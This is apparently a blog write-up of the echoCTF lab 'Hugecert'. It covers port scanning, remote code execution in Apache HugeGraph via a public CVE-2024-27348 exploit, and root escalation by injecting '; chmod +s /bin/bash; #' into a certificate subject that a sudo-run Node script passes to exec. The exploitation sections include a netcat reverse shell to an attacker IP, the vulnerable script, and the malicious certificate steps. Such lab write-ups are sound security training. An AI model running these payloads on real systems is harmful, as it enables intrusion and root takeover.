Hugecert (Intermediate)
Post

Hugecert (Intermediate)

24/02/2025
Preview Image
shuciran
3
Host entries
1

10.0.14.35

Content

  • RCE in Apache HugeGraph Server
  • Command Injection in certificate subject

Reconnaissance

Initial reconnaissance for TCP ports

1
2
3
4

nmap -p- -sS --open --min-rate 500 -Pn -n -vvvv -oG allPorts 10.0.14.35
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.14.35 ()     Status: Up
Host: 10.0.14.35 ()     Ports: 22/open/tcp//ssh///, 8080/open/tcp//http-proxy///

Services and Versions running:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

nmap -p22,8080 -sCV -n -Pn -vvvv -oN targeted 10.0.14.35
Nmap scan report for 10.0.14.35
Host is up, received user-set (0.16s latency).
Scanned at 2025-02-24 16:33:28 EST for 176s

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 79:1a:ac:bf:e9:92:f5:48:99:de:b0:17:62:e2:d1:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMfiQFI8we9T18DY6g3gb0FqxCUbdooHv8KHLGRUH7Enh/G711xtlPDbf5kJCqIutfOTAGEYSQqhZwgjCauHsXE=
|   256 38:1a:ab:2e:79:05:5a:01:88:be:f9:a0:cc:b9:ae:33 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICmdpjyxzBB3yNMwoIPp1kXeb/LaVj/tS8SBu+hcoR1M
8080/tcp open  http-proxy syn-ack ttl 63
|_http-title: Site doesn't have a title (application/json).
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
| fingerprint-strings:

Exploitation

There is a Web Service running on port 8080 called hugegraph v1.2.0 looking for exploits on it, we identified the following CVE-2024-27348 which is an OS Command Injection vulnerability, after downloading the git and execute it as it recommends, we have a way to execute commands:

1
2
3
4
5
6
7
8

python3 CVE-2024-27348.py -t http://10.0.14.35:8080 -c "nc -e /bin/bash 10.10.5.122 1234"
Proof of Concept exploit for CVE-2024-27348 Remote Code Execution in Apache HugeGraph Server by kljunowsky
[-] Request failed with status code: 500
[-] http://10.0.14.35:8080 may not be vulnerable
{"exception":"java.io.IOException","message":"error=2, No such file or directory","cause":"[java.io.IOException]"}
[+] Command executed successfully with payload 2
[+] Response:
{"exception":"java.lang.NoSuchFieldException","message":"","cause":"[java.lang.NoSuchFieldException]"}

Notice that it won’t get any output from the command executed, commands such as id, cat and so on, will work but won’t throw any information.

Privilege Escalation

For the Privilege Escalation I then proceed to execute the command sudo -l and I can execute a script as user root without password:

1
2
3
4
5
6

ETSCTF@hugecert:/opt/node/lib/node_modules/certer$ sudo -l
Matching Defaults entries for ETSCTF on hugecert:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ETSCTF may run the following commands on hugecert:
    (ALL : ALL) NOPASSWD: /opt/node/bin/certer

Its content is like this:

1
2
3
4
5
6
7
8
9
10
11
12
13

#!/opt/node/bin/node
const crypto = require("crypto");
const { exec } = require('child_process');
const fs = require('fs');
var args = process.argv.slice(2);
if(args.length===0)
{
  console.log("Provide a certificate file to process");
  process.exit(1);
}
cert = new crypto.X509Certificate(fs.readFileSync(args[0]).toString());
subj=cert.subject.replace(/\\/g, '').replace(/CN=/g,'');
exec(`mkdir /certs/${subj}`);

This makes a vulnerability on the mkdir command because is reading whatever is in the certificate subjet and then creating a folder with its name, so we can exploit this by adding malicious code to the subjet of a malicious certificate, to do so, we need to first create a key:

1

openssl genpkey -algorithm RSA -out malicious.key

Then generate a file with the subject, I called mine malicious.conf and this is the content:

1
2
3
4
5
6
7
8

[ req ]
default_bits        = 2048
default_md          = sha256
prompt              = no
distinguished_name  = req_distinguished_name

[ req_distinguished_name ]
CN = ; chmod +s /bin/bash; #

Generate the Certificate Signing Request (CSR):

1
2

openssl req -new -key malicious.key -out malicious.csr -config malicious.conf

Use the CSR to create a self-signed certificate:

1
2
3
4

openssl x509 -req -in malicious.csr -signkey malicious.key -out malicious.crt -days 365

Certificate request self-signature ok
subject=CN=; chmod +s /bin/bash;

Read the content of the certificate, to be sure:

1
2
3
4
5
6
7
8
9
10
11
12
13

openssl x509 -in malicious.crt -text -noout                                  
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            05:ed:21:55:1c:8c:e9:ec:a1:80:25:e7:45:76:3c:fe:46:7c:4c:9e
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=; chmod +s /bin/bash;
        Validity
            Not Before: Feb 24 21:27:23 2025 GMT
            Not After : Feb 24 21:27:23 2026 GMT
        Subject: CN=; chmod +s /bin/bash;
        Subject Public Key Info

And then run the sudo command:

1
2
3

ETSCTF@hugecert:/tmp$ sudo /opt/node/bin/certer malicious.crt 
ETSCTF@hugecert:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash

AND WE ARE INSIDEEE!!!

Post Exploitation

Flags are stored at:

/etc/passwd /etc/shadow environment variables (env command) /root

Credentials

  • No credentials we found

Notes

  • Always check for software versions to find any public exploit.

References

echoCTF, Intermediate